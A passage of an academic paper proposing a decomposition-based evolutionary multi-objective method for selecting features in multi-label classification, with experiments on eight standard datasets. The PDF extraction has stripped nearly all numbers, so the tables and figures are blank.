. /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ well. according to the definitions of the two objective functions, the proposed method attempts to find feature sets with a minimum number of features and a minimum classification error. the proposed genetic operators in this paper, we introduce a pool of crossover operators to obtain the benefits of various operators to produce better solutions. three genetic operators—single point, double point, and uniform crossover—are used to produce a new generation of candidate solutions. in each iteration, one of these crossover operators is selected. a random number p between and is generated as the selection probability of one of the operators. the ranges of the selection are specified using p and p , which can be determined in the experiments. if the generated number is less than p , the single-point crossover is applied to the parent solutions. in the single-point crossover, a random point is selected, and the tails of its two parents are swapped to generate new offspring. the double-point crossover is selected if p is between p and p . the double-point crossover is a generalization of the single-point crossover wherein alternating segments are swapped to generate new algorithm . (continued). z = f (y ) end end end // local search and obtaining final pareto separate non-dominated solutions from the updated population (ns); separate non-dominated solutions from ac and ns (ep); select a solution with the maximum crowding distance (xcr) and two random solutions xn , xn from ep; produce a new solution by using (eq. ); select the non-dominated solutions as the final pareto set from ep and �x; update the archive; it = it + ; end obtain the hamming loss for test data with the selected features of solutions in the final pareto front. number of features . …. . . …. . . . …. …. figure an instance of a feature selection representation. full-size doi: . /peerj-cs. /fig- asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ offspring. a probability greater than p causes the selection of the uniform crossover to produce offspring. it performs the swapping of the parents by choosing a uniform random real number (between and ). the random real number decides whether the first child selects the ith gene from the first or the second parent. for each variable, a uniform random number is generated. based on the value of this number, the child’s variable is selected from one of the parents. if the random number is more than . , the first parent’s variable would be selected, and vice versa. figure shows the process of selecting crossover operators. a uniform mutation is applied for a newly produced individual to guarantee the diversity property. a random number of features is selected from the generated subset. then, the values of the variables related to the corresponding features will be replaced with a new random uniform number between and . local search the domination concept is used to separate the best candidate solutions at the end of each iteration. all dominated solutions are omitted from the population. to improve the obtained pareto front in the decomposition-based algorithm, a local search (zhang et al., ) is applied to produce a candidate solution in the search space with a large crowding distance. we estimate the density of solutions surrounding each solution; hence, producing a new solution in the area with less density is desirable. for this purpose, at the end of each iteration, the final pareto front is saved in the archive (ac). a solution with the maximum crowding distance (xcr) is selected among non-dominated solutions of the new pareto front obtained from the current generation and the solutions in the archive (from the previous generations). a new solution is produced by using xcr and two random solutions, xn , xn , based on the following equation: �xi ¼ xcr þ f � ðxn � xn Þ ( ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . produce a real random number (p) p p≤p p>p p <p≤p . . . . . . . . . . . . . . figure the process of selecting crossover operators. full-size doi: . /peerj-cs. /fig- asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ parameter f is a scale factor that amplifies the difference between the two vectors. the final pareto front will include nondominated solutions among the newly produced solutions in the local search and ac; this local search is inspired by the differential evolution (de) algorithm (price, storn & lampinen, ). overall structure of the proposed method in the proposed method, the multi-objective problem is divided into scalar subproblems, and the best solution is simultaneously searched in each subproblem using an evolutionary algorithm. an appropriate pareto front will be achieved by solving each subproblem. figure illustrates the general idea of a minimization problem with two objectives and subproblems. as seen, a composition function g converts two objectives (f and f ) into one scalar objective. in addition, there exists a vector (with its dimensions equal to the number of objectives) that weights each objective in the composite function. according to the figure, the search space is divided into sections using uniformly distributed aggregation weight vectors. each section has a different weight vector, and each weight vector determines a search direction. the weight vectors are generated using das and dennis’ method (das & dennis, ). in this approach for constructing the weight vectors, we apply the uniform distribution scheme. let n be the number of subproblems, and λ , λ ,…, λn be the weight vectors, where each weight has a value from { , /n, /n,…, }. the sum of the individual weights of every subproblem should be equal to one. in the proposed method, � is the weight of the first objective (number of features) and � is the weight of the second objective (the hamming loss) in the first subproblem. figure distribution of weight vectors in a minimization problem. full-size doi: . /peerj-cs. /fig- asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ each subproblem includes the following parts: • an individual xi • the objective functions (i.e., the number of features and hamming loss, are considered) • a weight vector λi • the neighborhood of subproblem i • composite objective function gte based on eq. ( ). the number of subproblems is usually considered equal to the population size. in each generation, we form a population of the best solutions found for each subproblem. the neighborhood relations among subproblems are defined based on the distance between the weight vectors. during the search, we produce new solutions for each subproblem by the cooperation of neighborhood members and by using the proposed genetic operators (selection, crossover, and mutation). the new solutions compete with the neighbors of the old solutions; specifically, we compare weighted combinations of two objective functions for different solutions. the function weights indicate the moving direction of the population for finding an optimal solution. subsequently, the steps of the proposed algorithm are explained in detail. step . initialization: in this step, subproblems should be initialized. the proposed method starts by generating an initial population and weight vectors. the structure of each solution in the population is described in “representation of individuals”. there is a weight vector corresponding to every subproblem that is used to convert the multi- objective problem into a single-objective problem by using the tchebycheff method. as a result, the number of subproblems, the number of candidate solutions in the population, and the number of weight vectors are the same. the length of the weight vector would be equal to the number of objective functions. different uniformly distributed aggregation weight vectors distribute the candidate solutions in the whole search space; hence, a pareto front with appropriate diversity is achieved. in the subproblems where larger weight values are assigned to the first objective function, the number of features becomes more important than classification performance. therefore, the composite function forces the subproblem to find solutions with fewer features. in addition, we use the neighborhood concept to produce new solutions and improve the available solutions in the decomposition-based methods. therefore, for each subproblem, the closest weight vectors are calculated based on the euclidean distance from their neighbors. the values of the objective functions for all solutions in the initial population need to be calculated. therefore, the ml-knn classifier is applied to the training data with the feature subset of each candidate solution. furthermore, at the beginning of the algorithm, the reference point should be initialized to evaluate the candidate solutions using the tchebycheff method. in the proposed method, the minimum values of the objective functions among all the obtained candidate solutions are regarded as the reference point. point z = (z , z ) is considered as the reference point, where z is the minimum number of the selected features among the obtained solutions, and z is the minimum value of the classification error. this step is shown in lines – of algorithm . asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ step . regeneration: producing new candidate solutions (offspring) is one of the main steps of evolutionary algorithms. in the proposed method, the genetic operators (explained in the previous section) were used to produce new offspring. at every iteration, for each available subproblem, a new candidate solution should be produced. specifically, for each subproblem, two candidate solutions are randomly selected among the subproblem’s neighbors (the closest weight vectors). then, the proposed genetic crossover operator (explained in “the proposed genetic operators”) is applied to them. furthermore, a uniform mutation is used. the current candidate solution and all the neighbors are replaced with the newly obtained candidate solution if the new candidate solution performs better. this step is shown in lines – of algorithm . step . comparison and replacement: because of the conflicting objectives in multi- objective optimization problems, the comparison of the candidate solutions is always challenging. to compare the new candidate solution with the available ones, we use a decomposition-based method. specifically, the decomposition method tries to combine the objective functions and achieve a scalar function for making the comparison possible. here, different combination methods can be used. the proposed method uses the tchebycheff method to combine the objective functions. as mentioned in “tchebycheff method”, this method considers the distances between the objective values and the reference point. the distances of the first objective value (number of features) have larger values than the hamming loss, and this affects the performance of the tchebycheff method. therefore, it is better to normalize the obtained values of the objective functions. the tchebycheff value for the new candidate solution is calculated using the weight vector of the current solution. then, the new solution is compared with the current solution and any of its neighbors. the new solution replaces them if it is better than the previous solutions. finally, we expect to achieve a population with an improved generation. the population contains the best solution for each subproblem found so far. whenever a new solution is produced, the reference point also needs to be updated. these steps are shown in lines – of algorithm . step . local search and obtaining the pareto front: to increase the efficiency of the proposed algorithm, we use a local search with the concept of crowding distance. the details of the local search are given in “local search”. the final set of nondominated solutions will be obtained from the archive. these steps are shown in lines – of algorithm . as it is mentioned before, a set of non-dominated solutions are obtained at the last part of the search process. these solutions are trade-off feature subsets with a variety of number of features and classification performance. a user has different options and accordingly can make a decision based on corresponding application. for example, if the user prefers less computational complexity, he/she can select one of the small subsets with a small value of sacrificing the classification accuracy. multi-criteria decision making (mcdm) (velasquez & hester, ) is a process to rank and select from a set of candidate solutions with conflicting and non-commensurable criteria as an example, vikor (bidgoli et al., ) is one of such methods which ranks the multi-criteria solutions based asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the particular measure of closeness to the ideal point (a constructed point using minimum value of each objective). experimental design datasets for many applications, standard multi-label datasets are available. for each application, several datasets were selected to evaluate the proposed method. we consider the eight real- world multi-label datasets presented in table . these are complex datasets with many labels and features. the feature numbers ranged between and , . thus, feature selection in such datasets is considered as a large-scale optimization problem. moreover, the number of labels is between and . two datasets were selected from the field of biology. the first one is the yeast dataset (elisseeff & weston, ). in this dataset, genes can be placed in different activity groups. genbase is another dataset in the field of biology, which is related to the protein families (diplaris et al., ). there are different groups of protein structures defined in this dataset. every protein fiber can belong to one or several structures. in image classification, two datasets are used, scene (boutell et al., ) and flags (dheeru & karra taniskidou, ). the scene dataset is related to the categories of desert, beach, mountain, etc. for example, a scene image can have the labels of “mountain” and “sea” at the same time. the flags dataset contains information on flag images of different countries. in addition, we use multi-label text classification datasets to evaluate the efficiency of the proposed algorithm. the medical dataset (pestian et al., ) includes the classification of radiological reports in different categories. the enron (klimt & yang, ) dataset is another text classification dataset that includes the categories of the collected emails. in audio classification, the emotions dataset includes the categories of feelings in music (trohidis et al., ). the features of music have been extracted and categorized into categories of feelings (surprised, amazed, happy, pleased, calm, relaxing). each piece of music can include more than one feeling. the birds dataset (briggs et al., ) is related to the classification of birds using their recorded sounds. this dataset categorizes species of birds. table multi-label datasets used in the experiments. datasets domain #training instances #test instances #labels #features emotions music scene image , , flags image yeast biology , birds audio genbase biology , medical text , enron text , , asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experimental setup the multi-label dataset should be divided into training and test sets to evaluate the proposed method. during the optimization process, the performance of the selected features is evaluated by computing the accuracy of classification on training data. the test set is used to evaluate the obtained features and to report the final results at the end of the algorithm. the number of the training and test samples for each dataset is provided in table . the splitting of data into test and train subsets is based on the mulan library (tsoumakas et al., ), which provided these datasets. the classifier algorithm used in multi-label learning is the ml-knn classifier. to simplify the evaluation process, euclidean distance with k = was used in this study (zhang & zhou, ). some parameters need to be adjusted before the implementation of the proposed algorithm. the population size and the number of the function evaluations used were and , , respectively, for all methods. the algorithms were run times independently for each dataset. in the proposed method, the number of neighbors, t, was set to . the mutation rate in the genetic operators was . . to increase the diversity of solutions, a random number between . and . was used as the value of parameter f in the local search based on zhang et al. ( ). finally, the values of parameters p and p for selecting the crossover operator were set to . and . , respectively. results and discussion each dataset introduced in the previous section was given to the algorithm as the input data for evaluating the proposed method. then, a set of nondominated solutions was reported at the end of the algorithm. for each dataset, the algorithms were run for independent runs, and we obtained pareto fronts. the nondominated solutions in the union set of all pareto fronts were determined as the best pareto front. therefore, all comparisons were carried out between the best pareto fronts of the methods. the proposed method has been compared with the pso-based algorithm (zhang et al., ) and the nsga-ii-based (yin, tao & xu, ) multi-label feature selection algorithm, which are explained in “multi-label feature selection using multi-objective evolutionary algorithms” and the main version pf moea/d algorithm. assessment metrics a comparison of the multi-objective optimization methods in various applications is always challenging. therefore, we should find assessment metrics that facilitate the comparison. in this study, we used an extensive set of measures to evaluate the efficiency of the proposed algorithm. some assessment measures focus on one of the objective functions. the minimum number of the obtained features and the minimum classification error on the training and test sets are single-objective criteria for feature selection. because there may be some subsets with only a few features but a large classification error, we consider the subsets with a lower classification error instead of those using all features. from the multi-objective point of view, there are many evaluation measures that compare the obtained pareto fronts of competitors (akkan & gülcü, ). asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the hypervolume indicator (auger et al., ) is one of the well-known criteria for evaluating multi-objective optimization methods. this indicator evaluates multi-objective optimization algorithms according to both diversity and convergence to the optimal pareto front. this indicator determines the volume of the n-dimensional space that is surrounded by a set of points. the number of dimensions would be equal to the number of objectives. therefore, the volume of the two-dimensional space that is surrounded by the pareto solutions is calculated for the feature selection problem. the larger this space, the wider the points (surrounding a larger space) and the closer the pareto front to the optimal pareto. a reference point is needed to acquire the intended volume. the selection of a reference point is one of the challenges for the calculation of the hypervolume indicator. for example, a point with the worst obtained values among the objective functions is an option for this purpose. as shown in fig. , the volume of the gray regions between the solutions on the pareto front and the reference point would be considered as the hypervolume indicator. the measure is defined in eq. ( ) (auger et al., ): hvðaÞ ¼vol [ a a ½f ðaÞ; r � ½f ðaÞ; r � . . . ½fmðaÞ; rm� ! ; ( ) where a ∈ a is a point at which all candidate solutions are weakly dominated by it. the coverage of two sets is another metric for comparing the pareto front obtained by multi-objective methods (zitzler & thiele, ). this criterion uses the domination concept. coverage (a, b) for two algorithms a and b is the total number of obtained reference point f f figure hypervolume indicator. full-size doi: . /peerj-cs. /fig- asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ solutions on the final pareto front of algorithm a that dominates the solutions of the pareto front of algorithm b. in this way, coverage (b, a) indicates the number of obtained solutions of b that dominate the pareto points of a. to evaluate the statistical significance of the obtained results, we conducted the friedman test (calzada-ledesma et al., ) with a confidence interval of %. the ranks computed by means of the non-parametric test are reported for the obtained results. in each table, the last row indicates the statistical test results. w/t/l represents the number of wins, ties, and losses of the proposed method comparing to other algorithms. results and analysis in this section, we report the results of the comparison between the proposed method and two other multi-objective methods for multi-label data feature selection. table shows the minimum hamming loss on the training and test data in different datasets. the second column indicates the classification error on the test data using all features without feature selection. the other columns show the classification error on training and test data by applying feature selection methods. reducing the hamming loss of classification using feature selection is evidence of existing irrelevant features in all datasets. table shows that the proposed method has achieved significantly better results compared with the other two methods on the training set. it obtained a smaller hamming loss in a out of in comparison with the pso method. the results are even better comparing to moea/d and nsga-ii, so that it has reached less error on out of datasets. regarding the test data, the proposed algorithm shows a better performance in most of the datasets. it outperforms the pso and moea/d in out of datasts. comparing to nsga-ii, the proposed method has better accuracy on out of datasets. if the methods are evaluated in terms of the number of features in the obtained subsets, regardless of the classification error, the solutions that have few features and high classification errors would be reported as desirable solutions. therefore, to give a reasonable comparison, solutions that achieved a lower classification error than using all table comparison on minimum hamming loss (hl) on training and test sets. the second column represents the hl values of the classification using all features. highlighted numbers in the table indicate which method reaches lower hamming loss on each dataset. datasets hl using all features minimum training hl using feature selection minimum testing hl using feature selection proposed method pso-based method nsga-ii method moea/d method proposed method pso-based method nsga-ii method moea/d method emotions . . . . . . . . . scene . . . . . . . . . yeast . . . . . . . . . birds . . . . . . . . . genbase . . . . . . . . . medical . . . . . . . . . enron . . . . . . . . . flags . . . . . . . . . w/t/l – / / / / / / – / / / / / / asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ features are selected. the minimum number of the selected features among these solutions is reported in table . in fact, this table represents the smallest subset of features which could obtain a classification with hamming loss less than using all features. therefore the minimum number of test features in this table indicates that which subset of features with minimum number of features could reach less error than all features on test subset. in most cases, the proposed method selected a lower number of features than two other methods. the difference between the number of selected features using the proposed method and competitors is remarkable; e.g., the proposed method has achieved a smaller hamming loss than other methods on the test set of the birds dataset using only features, whereas this number is in the pso-based method and in nsga-ii, which means that the proposed method has further reduced the number of features by one-fiftieth. in the genbase dataset, the proposed method has decreased the number of features to , while the main dataset has , features. results based on set-coverage metric as mentioned in the previous section, the set coverage criterion is another measure used to compare the proposed method with other multi-objective feature selection methods. table shows the values of set coverage obtained by the different methods. in this table, ‘a’ indicates the proposed method, and ‘b’ is the competitor. therefore, c (a, b) shows the average ratio of the number of solutions obtained by the proposed algorithm in each run that dominate the solutions of another algorithm. the mean, median, and standard deviation of -set coverage values are reported on training and test data in table . as shown in the table, the proposed method achieved comparable results to the pso-based method on the training set but a significant improvement on the test set. the results show that in the datasets with large numbers of features, such as genbase, medical, and enron, the proposed method achieved significantly better results than the others. for example, on the training results in the genbase dataset, % of solutions of the proposed method dominate pso-based solutions, while this number is just % for pso-based table comparison on smallest feature subset with hamming loss less than all features obtained by each method on training and test sets. highlighted numbers in the table indicate which method reaches smaller feature subsets on each dataset. datasets all features minimum number of training features minimum number of test features proposed method pso-based method nsga-ii method moea/d method proposed method pso-based method nsga-ii method moea/d method emotions scene yeast birds genbase , medical , enron , flags w/t/l – / / / / / / – / / / / / / asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ solutions. therefore, the proposed method showed a high efficiency compared to two other algorithms for large-scale optimization problems. in comparing to nsga-ii and moea/d, the proposed method achieved significantly better results on all datasets. it means that the obtained pareto front completely dominates obtained solutions by these algorithms. similar results are repeated for the test data, whose results are more important than the training data. for test data, the proposed algorithm had a higher -set coverage value than the pso-based algorithm in all datasets except flags and emotions. the difference in most datasets is significant. on datasets like genbase and medical, -set coverage of the proposed method is two times more than competitors. for example, in the genbase dataset, the proposed method dominates % of pso-based solutions, while the table comparison on -set coverage indicator of training and test data. c (a, b) is the value of the -set coverage between the proposed method and competitor. highlighted numbers in the table indicate which method reaches higher coverage on each dataset. datasets training data test data pso-based method (b) nsga-ii method (b) moea/d method (b) pso-based method (b) nsga-ii method (b) moea/d method (b) c (a, b) c (b, a) c (a, b) c (b, a) c (a, b) c (b, a) c (a, b) c (b, a) c (a, b) c (b, a) c (a, b) c (b, a) emotions mean . . . . . . . . . . . . median . . . . . . . . . . . . std . . . . . . . . . . . . scene mean . . . . . . . . . . . . median . . . . . . . . . . . . std . . . . . . . . . . . . yeast mean . . . . . . . . . . . . median . . . . . . . . . . . . std . . . . . . . . . . . . birds mean . . . . . . . . . . . . median . . . . . . . . . . . . std . . . . . . . . . . . . genbase mean . . . . . . . . . . . . median . . . . . . . . . . . . std . . . . . . . . . . . . medical mean . . . . . . . . . . . . median . . . . . . . . . . . . std . . . . . . . . . . . . enron mean . . . . . . . . . . . . median . . . . . . . . . . . . std . . . . . . . . . . . . flags mean . . . . . . . . . . . . median . . . . . . . . . . . . std . . . . . . . . . . . . w/t/l – / / – / / – / / – / / – / / – / / asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pso-based method dominates only % of the others’ solutions. regarding the nsga-ii method, the value of the -set coverage of the proposed method is significantly higher than the nsga-ii method on all datasets. the proposed method even reached % -set coverage in the medical dataset. it means that all solutions of the proposed method dominated the solutions obtained by the nsga-ii algorithm at each run. also this table shows the compared results of -set coverage on moea/d and the proposed method. on most of the datasets, proposed method dominates all obtained solutions using moea/d algorithm. it confirms that the modification of the algorithm, specially adding the local search, leads finding more non-dominated solutions. results based on hypervolume metric the hypervolume indicator is another multi-objective measure that compares the results of the proposed method with other algorithms. the value of this criterion was calculated for the pareto front obtained in each run. the comparison of the mean, median, and standard deviation of hypervolume indicators for independent runs on each dataset is provided in table . in most of the datasets, the hypervolume indicator of the proposed method is more than . , while for two other methods, all the values are less than . . for nsga-ii, the hypervolume values are between . and . . the pso-based and moea/d methods outperform the proposed method in terms of the hypervolume indicator only on the flags dataset. otherwise, the proposed method had significantly better results compared to other algorithms. therefore, as this measure indicates, the proposed method presents well-distributed solutions that are closer to the optimal pareto front. the ranks computed by means of non-parametric friedman tests are reported at the end of table based on -set coverage and hypervolume metric. notice that the smallest rank corresponds to the best-performing method. results based on pareto fronts the comparison between the best obtained pareto fronts in different methods on training and test sets is shown in figs. and . the proposed method has a better pareto front in most of the datasets compared to the other methods in terms of both the number of features and the classification performance. the diversity of the obtained solutions is one of the properties of the obtained pareto front of the proposed method. in datasets such as genbase, the proposed method has a better pareto front than other methods. it means that, with equal numbers of features, the proposed method achieved a lower hamming loss. in some datasets such as birds, emotions, and enron, the pareto front obtained from the pso-based method has a better performance than the proposed method only in a few regions (mostly in the middle part of the pareto front). however, we can see that the -set coverage of the proposed method is higher in most of the datasets, according to pareto fonts. based on a comparison of the hypervolume indicator, it is obvious that wider pareto fronts lead to higher values of hypervolume on all datasets. furthermore, the proposed algorithm has a considerably better performance than the nsga-ii algorithm in all datasets, and as discussed previously, all the solutions of nsga-ii are dominated using the proposed method. nsga-ii has a smaller pareto front asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ compared to other methods. this algorithm could find just a small number of solutions in the search space. regarding the comparison between the proposed method and the original version of moea/d, as it is presented in the plots, the proposed method obtains the wider pareto front with more non-dominated solutions. on most of the datasets, moea/d pareto front is placed between nsga-ii and pso pfs (i.e., better than nsga-ii but worse table comparison on hypervolume indicator of training and test pareto fronts. highlighted numbers in the table indicate which method reaches higher hypervolume indicator on each dataset. datasets hypervolume of training pareto front hypervolume of test pareto front proposed method pso-based method nsga-ii method moea/d method proposed method pso-based method nsga-ii method moea/d method emotions mean . . . . . . . . median . . . . . . . . std . . . . . . . . scene mean . . . . . . . . median . . . . . . . . std . . . . . . . . yeast mean . . . . . . . . median . . . . . . . . std . . . . . . . . birds mean . . . . . . . . median . . . . . . . . std . . . . . . . . genbase mean . . . . . . . . median . . . . . . . . std . . . . . . . . medical mean . . . . . . . . median . . . . . . . . std . . . . . . . . enron mean . . . . . . . . median . . . . . . . . std . . . . . . . . flags mean . . . . . . . . median . . . . . . . . std . . . . . . . . w/t/l – / / / / / / – / / / / / / table ranks of feature selection methods according to friedman test. highlighted numbers in the table indicate which method reaches best rank. proposed method pso-based nsga-ii moea/d -set coverage . . . . hypervolume indicator . . . . asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ than pso) while the proposed method dominates most of the obtained solutions of those methods. it means that modification on original algorithm has improved the performance of process of the multi-objective search. the local search strategy finds better solutions in terms of dominance, however, moea/d algorithm doesn’t utilize dominance number of features . . . . . . . . h a m m in g lo ss pareto front of emotions train dataset nsga-ii moea/d pso-based proposed method (a) number of features . . . . . . . . h a m m in g lo ss pareto front of scene train dataset nsga-ii moea/d pso-based proposed method (b) number of features . . . . . . . h a m m in g lo ss pareto front of yeast train dataset nsga-ii moea/d pso-based proposed method (c) number of features . . . . . . . . . . h a m m in g lo ss pareto front of birds train dataset nsga-ii moea/d pso-based proposed method (d) number of features . . . . . . . . . . . h a m m in g lo ss pareto front of enron train dataset nsga-ii moea/d pso-based proposed method (e) . . . . . number of features . . . . . . . . h a m m in g lo ss pareto front of flags train dataset nsga-ii moea/d pso-based proposed method (f) figure train pareto front on training data including (a) emotions, (b) scene, (c) yeast, (d) birds, (e) enron, and (f) flags. full-size doi: . /peerj-cs. /fig- asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ concept to select the best solutions. therefor, as it is obvious, a combination of decomposition and dominance can find more promising regions in the search space. this strategy improves the exploitation power of the algorithm. on the other hand, applying a combination of crossover operators increases the exploration power of the search number of features . . . . . . . . . h a m m in g lo ss pareto front of emotions test dataset nsga-ii moea/d pso-based proposed method (a) number of features . . . . . . . . . . h a m m in g lo ss pareto front of scene test dataset nsga-ii moea/d pso-based proposed method (b) number of features . . . . . . . . . h a m m in g lo ss pareto front of yeast test dataset nsga-ii moea/d pso-based proposed method (c) number of features . . . . . . . . . h a m m in g lo ss pareto front of birds test dataset nsga-ii moea/d pso-based proposed method (d) number of features . . . . . . . . . . . h a m m in g lo ss pareto front of enron test dataset nsga-ii moea/d pso-based proposed method (e) number of features . . . . . . . . . . h a m m in g lo ss pareto front of flags test dataset nsga-ii moea/d pso-based proposed method (f) figure pareto front on test data including (a) emotions, (b) scene, (c) yeast, (d) birds, (e) enron, and (f) flags. full-size doi: . /peerj-cs. /fig- asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm. another advantage of the obtained pareto front in the proposed algorithm is the ability of the method to search in the scope of the solutions with a low number of features while the other two methods have not obtained such solutions. this issue is more prominent regarding the nsga-ii algorithm, and the solutions obtained by this method have not been as successful as the other two methods in decreasing the number of features. the number of features in the proposed method is usually smaller than pso-based and nsga-ii obtained features. as it is concluded from experiments, the proposed method can find a set of feature subsets which in multi-label classification tasks can be used. in each multi-label classification such as all applications which are experimented in this paper, we need to select the best features. therefore, based on mcdm, a set of features can be selected among subsets on the pareto front to improve the performance of the classification. concluding remarks many real-world applications require multi-label classification. if more than one label exists, feature selection plays a significant role in the performance of the multi-label classification. the main purpose of this paper is to propose a decomposition-based evolutionary multi-objective method for selecting optimal features in multi-label data. the multi-objective search space is divided into several scalar subproblems so that each subproblem can be solved using evolutionary algorithms. it yields a more effective search process to improve the quality of the obtained solutions. to increase the efficiency of the proposed method, a local search is used. this gives more exploitation power for finding better feature subsets. in addition, a combination of the various crossover operators results in more diverse solutions. the results indicate that this method achieves a better pareto front in most of the standard multi-label datasets compared to the other methods in terms of both the number of features and the classification performance. furthermore, the progress of the results in other evaluation criteria, such as the -set coverage and hypervolume indicator, represents a considerable performance improvement of the proposed method compared to the previous methods. despite the satisfactory performance of the proposed method, several points are considered for future investigations. the efficiency of the proposed algorithm can be examined in more problems, especially in more real-world applications. in the present study, only two objectives were evaluated. additional objective functions may be considered in future work. moreover, the proposed method uses continuous genetic operators, which can be replaced with binary operators to improve the performance. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author contributions azam asilian bidgoli conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. hossein ebrahimpour-komleh conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. shahryar rahnamayan conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and code are available in the supplemental files. our experimental data are multi- label classification datasets taken from mulan library: http://mulan.sourceforge.net/datasets-mlc.html. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references akkan c, gülcü a. . a bi-criteria hybrid genetic algorithm with robustness objective for the course timetabling problem. computers & operations research : – doi . /j.cor. . . . auger a, bader j, brockhoff d, zitzler e. . theory of the hypervolume indicator: optimal μ- distributions and the choice of the reference point. in: proceedings of the th acm sigevo workshop on foundations of genetic algorithms. new york, ny: acm, – . bidgoli aa, rahnamayan s, mahdavi s, deb k. . a novel pareto-vikor index for ranking scientists’ publication impacts: a case study on evolutionary computation researchers. in: ieee congress on evolutionary computation (cec), ieee, wellington, new zealand. – . blum al, langley p. . selection of relevant features and examples in machine learning. artificial intelligence ( ): – doi . /s - ( ) - . boutell mr, luo j, shen x, brown cm. . learning multi-label scene classification. pattern recognition ( ): – doi . /j.patcog. . . . briggs f, huang y, raich r, eftaxias k, lei z, cukierski w, hadley sf, hadley a, betts m, fern xz. . the th annual mlsp competition: new methods for acoustic classification of multiple simultaneous bird species in a noisy environment. in: international workshop on machine learning for signal processing (mlsp), ieee, southampton, uk. – . calzada-ledesma v, puga-soberanes hj, ornelas-rodríguez m, rojas-domínguez a, carpio- valadez jm, espinal a, soria-alcaraz ja, sotelo-figueroa ma. . evolutionary design of problem-adapted image descriptors for texture classification. ieee access : – doi . /access. . . chandrashekar g, sahin f. . a survey on feature selection methods. computers & electrical engineering ( ): – doi . /j.compeleceng. . . . asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://mulan.sourceforge.net/datasets-mlc.html http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.compeleceng. . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. das i, dennis je. . normal-boundary intersection: a new method for generating the pareto surface in nonlinear multicriteria optimization problems. siam journal on optimization ( ): – doi . /s . deb k, agrawal s, pratap a, meyarivan t. . a fast elitist non-dominated sorting genetic algorithm for multi-objective optimization: nsga-ii. ppsn : – . dembczynski k, waegeman w, cheng w, hullermeier e. . on label dependence and loss minimization in multi-label classification. machine learning ( – ): – doi . /s - - - . dendamrongvit s, vateekul p, kubat m. . irrelevant attributes and imbalanced classes in multi-label text-categorization domains. intelligent data analysis ( ): – doi . /ida- - . dheeru d, karra taniskidou e. . uci machine learning repository. irvine: university of california, school of information and computer science. diplaris s, tsoumakas g, mitkas pa, vlahavas i. . protein classification with multiple algorithms. in: panhellenic conference on informatics. berlin: springer, – . el aziz ma, hassanien ae. . modified cuckoo search algorithm with rough sets for feature selection. neural computing and applications ( ): – doi . /s - - - . elaziz ma, ewees aa, ibrahim ra, lu s. . opposition-based moth-flame optimization improved by differential evolution for feature selection. mathematics and computers in simulation : – doi . /j.matcom. . . . elaziz mea, ewees aa, oliva d, duan p, xiong s. . a hybrid method of sine cosine algorithm and differential evolution for feature selection. in: international conference on neural information processing. cham: springer, – . elisseeff a, weston j. . a kernel method for multi-labelled classification. in: advances in neural information processing systems. – . ibrahim ra, elaziz ma, oliva d, cuevas e, lu s. a. an opposition-based social spider optimization for feature selection. soft computing ( ): – doi . /s - - -x. ibrahim ra, ewees aa, oliva d, elaziz ma, lu s. b. improved salp swarm algorithm based on particle swarm optimization for feature selection. journal of ambient intelligence and humanized computing 